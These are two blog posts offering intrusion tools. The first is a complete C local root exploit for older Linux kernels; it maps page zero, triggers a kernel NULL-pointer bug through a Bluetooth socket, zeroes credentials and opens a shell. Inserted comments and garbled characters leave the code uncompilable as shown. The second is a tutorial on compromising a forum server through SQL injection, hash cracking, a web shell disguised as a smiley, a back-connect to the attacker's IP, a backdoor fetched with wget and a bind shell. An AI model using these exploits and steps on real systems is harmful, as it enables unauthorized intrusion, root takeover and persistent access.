
Friday, 8 June 2012

2.6.18 2011 Local Root Exploit

Posted By Maher Bro


Local roots are used to root Linux servers according to their kernel version, so here’s the local root exploit for 2.6.18 (2011), 100% working :) .
Click here to get the local root from the paste.
/*
*
*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ __ 1
* 1 /’ \ __ /’__`\ /\ \__ /’__`\ 0
* 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
* 1 \/_/\ \ /’ _ `\ \/\ \/_/_\_<_ /’___\ \ \/\ \ \ \ \/\`’__\ 0
* 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
* 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
* 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
* 1 \ \____/ >> Exploit database separated by exploit 0
* 0 \/___/ type (local, remote, DoS, etc.) 1
* 1 0
* 0 By CrosS 1
* 1 0
* 0 Linux 2011 1
* 1 0
* -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
*
* Linux 2.6.18-128.el5
* Linux 2.6.9-89.EL
* Ubuntu 8.10 Linux 2.6.27
*
* For i386 & ppc compile with the command;
* gcc -w -o exploit exploit.c
*
* For x86_64 kernel and ppc64 Compile as;
* gcc -w -m64 -o exploit exploit.c
*
* Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ….. & all members of r00tw0rm.com ( RW ) .. )
*
* Submit Your Exploit at Submit@1337day.com | mr.inj3ct0r@gmail.com
*
* For Educational purpose Only))
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
/*
 * Return the current stack pointer (x86-64 variant).
 *
 * Copies %rsp into a local through inline asm.  On this 64-bit path the
 * task_struct is located through %gs (see current_task_struct() below),
 * so this helper is not referenced by the 64-bit code on this page.
 * NOTE(review): the parameter list is rendered as "(****)" by the blog;
 * the listing is not valid C as pasted.
 */
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;
asm volatile (“movq %%rsp,%0; ” : “=r” (sp));
return sp;
}
#else
/*
 * Return the current stack pointer (32-bit x86 variant).
 *
 * Copies %esp into a local through inline asm.  The 32-bit
 * current_task_struct() masks this value down to the kernel stack base,
 * so it is only meaningful while executing in kernel context.
 */
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;
asm volatile (“movl %%esp,%0″ : “=r” (sp));
return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
/*
 * Return the current stack pointer (PowerPC variant).
 *
 * Copies r1 (the PowerPC stack pointer register) into a local through
 * inline asm; used by the PowerPC current_task_struct() below to find
 * the kernel stack base.
 */
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;
asm volatile (“mr %0,%%r1; ” : “=r” (sp));
return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
/*
 * Return what the code treats as the current task_struct (x86-64 variant).
 *
 * Reads the 8-byte word at offset 0 of the segment addressed by %gs.  That
 * is only a task_struct pointer while executing in kernel context (i.e.
 * after the kernel has transferred control into the stub main() places at
 * address 0) and only on kernels whose per-CPU layout keeps it there —
 * presumably the versions listed in the file header; not verified here.
 * No validation is performed on the value.
 */
static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct;
asm volatile (“movq %%gs:(0),%0; ” : “=r” (task_struct));
return task_struct;
}
#else
#define TASK_RUNNING 0
/*
 * Locate what the code treats as the current task_struct (32-bit x86).
 *
 * Only meaningful while executing in kernel context with the kernel stack
 * in %esp.  Two stack layouts are tried in order:
 *   1. a thread_info at the base of a 4 KiB-aligned stack whose first
 *      word is a kernel-space pointer (>= 0xc0000000, presumably the
 *      default 32-bit kernel/user split) to the task_struct;
 *   2. an 8 KiB-aligned stack holding either the task_struct itself or a
 *      thread_info pointing to it.
 * A candidate is accepted when its first word equals TASK_RUNNING.
 * Returns -1 (converted to unsigned long) when nothing matched.
 * NOTE(review): alignment sizes and the state-field offset are internals
 * of the specific kernel builds named in the header and are assumed, not
 * checked, here.
 */
static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct, thread_info;
/* layout 1: thread_info at the base of a 4 KiB stack */
thread_info = current_stack_pointer() & ~(4096 – 1);
if (*(unsigned long *)thread_info >= 0xc0000000) {
task_struct = *(unsigned long *)thread_info;
/*
 * TASK_RUNNING is the only possible state for a process that was
 * executing in user space when it entered the kernel.
 */
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
}
/*
 * Prior to the 2.6 kernel series, the task_struct was stored at the end
 * of the kernel stack.
 */
task_struct = current_stack_pointer() & ~(8192 – 1);
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
/* otherwise treat the stack base as a thread_info and follow its first word */
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
/*
 * Locate what the code treats as the current task_struct (PowerPC).
 *
 * Masks the kernel stack pointer down to the stack base (16 KiB on 64-bit,
 * 8 KiB on 32-bit) and accepts either the task_struct itself at the base or
 * a thread_info there whose first word points to it; a candidate is
 * accepted when its first word equals TASK_RUNNING.  Returns -1 (converted
 * to unsigned long) when nothing matched.
 * NOTE(review): the stack sizes and state-field offset are assumptions
 * about the kernel builds named in the header, not checked here.
 */
static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct, thread_info;
#if defined(__LP64__)
task_struct = current_stack_pointer() & ~(16384 – 1);
#else
task_struct = current_stack_pointer() & ~(8192 – 1);
#endif
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
/* fall back: stack base holds a thread_info whose first word is the task_struct */
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
/* Caller's real uid/gid, recorded by main() so the scan below can recognise them. */
static unsigned long uid, gid;
/*
 * Payload that runs in kernel context (x86): the stub main() writes to
 * address 0 transfers control here.
 *
 * Starting at the address current_task_struct() returned, walk memory one
 * 32-bit word at a time until eight consecutive words read as
 * uid,uid,uid,uid,gid,gid,gid,gid — taken to be the task's credential
 * fields on the kernels named in the header (an assumption about struct
 * layout, not verified here) — and overwrite all eight with 0, i.e. make
 * the process root.
 *
 * The loop ends only on a match (break) or if the pointer wraps to NULL;
 * there is no upper bound on the scan.  The -1 return value is not
 * consumed by any code on this page.
 */
static int
change_cred(****)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (task_struct[0] == uid && task_struct[1] == uid &&
task_struct[2] == uid && task_struct[3] == uid &&
task_struct[4] == gid && task_struct[5] == gid &&
task_struct[6] == gid && task_struct[7] == gid) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
/*
 * Payload that runs in kernel context (PowerPC): the descriptor or branch
 * sequence main() writes to address 0 transfers control here.
 *
 * Unlike the x86 variant this does not know the caller's uid/gid; it walks
 * memory from the address current_task_struct() returned, skipping zero
 * words, until it finds a non-zero word repeated four times followed by
 * another value repeated four times, assumes those eight words are the
 * task's credential fields (a layout assumption, not verified here), and
 * overwrites all eight with 0.
 *
 * The loop ends only on a match (break) or if the pointer wraps to NULL.
 * The -1 return value is not consumed by any code on this page.
 */
static int
change_cred(****)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
/* zero words cannot be a uid run of interest; skip them */
if (!task_struct[0]) {
task_struct++;
continue;
}
if (task_struct[0] == task_struct[1] &&
task_struct[0] == task_struct[2] &&
task_struct[0] == task_struct[3] &&
task_struct[4] == task_struct[5] &&
task_struct[4] == task_struct[6] &&
task_struct[4] == task_struct[7]) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#endif
/* Runtime page size; the scratch file below is sized to exactly one page. */
#define PAGE_SIZE getpagesize()
/*
 * Entry point.  The sequence is:
 *   1. record the caller's uid/gid for change_cred() (x86 only);
 *   2. map one readable/writable/executable page at virtual address 0 with
 *      MAP_FIXED.  The whole technique depends on this: a kernel that later
 *      calls through a NULL function pointer executes whatever sits here.
 *      Kernels that forbid low mappings (e.g. via the vm.mmap_min_addr
 *      sysctl) fail this step and the program exits at perror("mmap");
 *   3. fill page 0 with an architecture-specific stub — a few bytes of
 *      machine code plus the address of change_cred() on x86, a fake
 *      function descriptor or branch sequence on PowerPC;
 *   4. open a Bluetooth datagram socket and a one-page temporary file and
 *      sendfile() the file into the socket.  On the kernel versions listed
 *      in the header this is presumably what reaches the NULL function
 *      pointer that lands in the stub; the sendfile() result is not
 *      checked, so on a patched kernel the program simply continues;
 *   5. exec an interactive shell, which inherits whatever credentials
 *      change_cred() left on the process.
 *
 * NOTE(review): the listing as rendered by the blog is not compilable
 * verbatim (typographic quotes, "(****)" parameter lists, "0×1000").
 */
int
main(****)
{
char *addr;
int out_fd, in_fd;
char template[] = “/tmp/tmp.XXXXXX”;
#if defined(__i386__) || defined(__x86_64__)
uid = getuid(), gid = getgid();
#endif
/* Step 2: the zero page.  MAP_FIXED at NULL is what mmap_min_addr-style
 * hardening rejects; that is the intended defence against this class of bug. */
if ((addr = mmap(NULL, 0×1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
perror(“mmap”);
exit(EXIT_FAILURE);
}
/* Step 3: stub at address 0 that hands control to change_cred(). */
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
addr[0] = ‘\xff’;
addr[1] = ‘\x24′;
addr[2] = ‘\x25′;
*(unsigned long *)&addr[3] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
addr[0] = ‘\xff’;
addr[1] = ‘\x25′;
*(unsigned long *)&addr[2] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
/*
 * The 64-bit Power ELF ABI calls functions through function descriptors,
 * so the first word of page 0 must look like one: copy the first word of
 * change_cred()'s own descriptor there.
 */
*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
/* 32-bit PowerPC: instruction bytes with change_cred's address split into
 * its upper and lower 16-bit halves at offsets 2 and 6. */
addr[0] = ‘\x3f’;
addr[1] = ‘\xe0′;
*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
addr[4] = ‘\x63′;
addr[5] = ‘\xff’;
*(unsigned short *)&addr[6] = (unsigned short)change_cred;
addr[8] = ‘\x7f’;
addr[9] = ‘\xe9′;
addr[10] = ‘\x03′;
addr[11] = ‘\xa6′;
addr[12] = ‘\x4e’;
addr[13] = ‘\x80′;
addr[14] = ‘\x04′;
addr[15] = ‘\x20′;
#endif
#endif
/* Step 4: trigger.  An unprivileged process opening a PF_BLUETOOTH socket
 * and sending a file into it is an unusual event worth alerting on. */
if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
perror(“socket”);
exit(EXIT_FAILURE);
}
if ((in_fd = mkstemp(template)) == -1) {
perror(“mkstemp”);
exit(EXIT_FAILURE);
}
/* unlink immediately so the scratch file leaves nothing on disk */
if(unlink(template) == -1) {
perror(“unlink”);
exit(EXIT_FAILURE);
}
if (ftruncate(in_fd, PAGE_SIZE) == -1) {
perror(“ftruncate”);
exit(EXIT_FAILURE);
}
/* return value deliberately ignored; on a patched kernel this just fails */
sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
/* Step 5: shell inherits the process credentials as they now stand. */
execl(“/bin/sh”, “sh”, “-i”, NULL);
exit(EXIT_SUCCESS);
}
Just copy the above code and save it as anyname.c. I hope you will like it, and don’t forget to share it :) .

Thursday, 7 June 2012

Rooting Tutorial! (Exploiting and Rooting a Webserver from)



Scratch Complete Tutorial
Intro:

For today's tutorial we shall learn how to
exploit and root a webserver, and also how to gain future access. The tutorial is divided into three parts.

1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access

Hacking a Forum Admin using Exploit to Gain,

Admin Access - Part 1:

As said earlier, I'm going to exploit an IPB v2.1 forum here. You can hack
other forums too, using existing exploits or making your own (which is rare).

Tools Needed:

This has the shell and backdoor files along with MD5 HashCracking tool and
some other things.

Download:
Code:
http://depositfiles.com/files/9juskrtax

Gaining Admin Access:

For today i will be hacking an ipb 2.1 forum by gaining admin access and
then I will show you how to root the server.
First i will be using a perl exploit and gain admin access to the forum. Usually the admin id

is 1 maybe 0 or 2 sometimes.

Here it is this guy:

UserName: Kawool
UserId = 2

Next we extract the user hash and salt. Switch to cmd and execute the perl
exploit.

Then you should see this sql injection tool.
Change the forum index path, userid (of the admin), the table name.

After you click get data from database you should see this hash:
Then use converage pass salt option.

After you get the hash the next step to do is crack the salted hash. Since
it is ipb , cracking the hash will be a pain for sure.

Cracking the Hash:

I have provided passwords pro in the download above. It is a very efficient
tool to crack md5 hashes, even salted ones.

Now probably go to sleep or drink 4-5 cup of tea until the hash is cracked.

I got mine after sometime.

So now:

Code:
Username: Kawool

Password: *******
I'm gonna login as admin now ^^; Lets move on to the main part of gaining root access.

Uploading The Shell as Admin - Part 2:

Uploading a Shell:

Now that we have the admin access in our hand now is the part when we

upload a shell (For those who don't know what a shell is, It is a php script that gives

privileges to upload files on a website, mess with other files etc. And yeah, allows you to gain

root access too).

Uploading shell as smiley here.

In the ACP Go to Look and Feel -> Emoticon Manager -> Upload the shell file as smiley.


Now lets browse our shell shall we..

w00t we has the shell uploaded properly.Next upload a c99 shell from this shell. Why we did

this is because c99 shells can sometimes be detected. So the other shell is like a decoy.

Once its done we upload c99 shell.

Good shell was uploaded properly.

That does it for our 2nd part. Move on to Third.

Using the Shell to Gain Root Access - Part 3:

Now that we have all the shit ready for rooting lets upload a backconnect script. There are many and if one doesn't work usually the other does.

So i upload back.pl i provided in the file.

After thats done time to use the script.

For this we give the following code.

Code:
perl back.pl youripaddress

BEFORE we execute the script we need to start netcat and listen for connections on

port 2121.

use netcat from my downloadfile, and use the command:

Code:
nc -vv -l -p 2121

Next we shall upload an exploit that will let us obtain root status on the server

Time to execute it.

Now we upload a backdoor for future access.

Type in the following command:
Code:
wget www.revitalizemessage.com/xpl/sshdoor.tgz (or whatever ur link is)
Now the following command:
Code:
tar -zxvf sshdoor.tgz
Then we make sshdoor the current directory using this code:
Code:
cd sshdoor
Then:
Code:
cat README
after you see the window with sang and prabu name. Execute the command:
Code:
.install yourpassword 2121
After thats done, we connect to the server via putty.

Err, an epic fail has occurred, my friends.

Maybe the host blocked the port, nmap scan revealed it. Oh well we upload another backdoor quickly. You don't always win (actually hackers do O_O).

Now we upload xbind.c this should be over quickly. Remember the steps don't you?

Indeed its easy.

Compile the xbind.c using gcc compiler. (be sure to type cd.. and be in the correct directory to work with the script):
Code:
gcc -o xbind xbind.c
Compile, run and connect.

Paste the following code now:
Code:
./xbind 1985
Switch to netcat again. and run the connection code (nc vv blah blha blah) to the ip.

Now enter the password and get going.

Code:
uname -a
There you go, we now have future access to the server

That does it for our Rooting Server tutorial. Yeah i agree, Gaining root access is a pain but its worth the reward.

Tutorial Source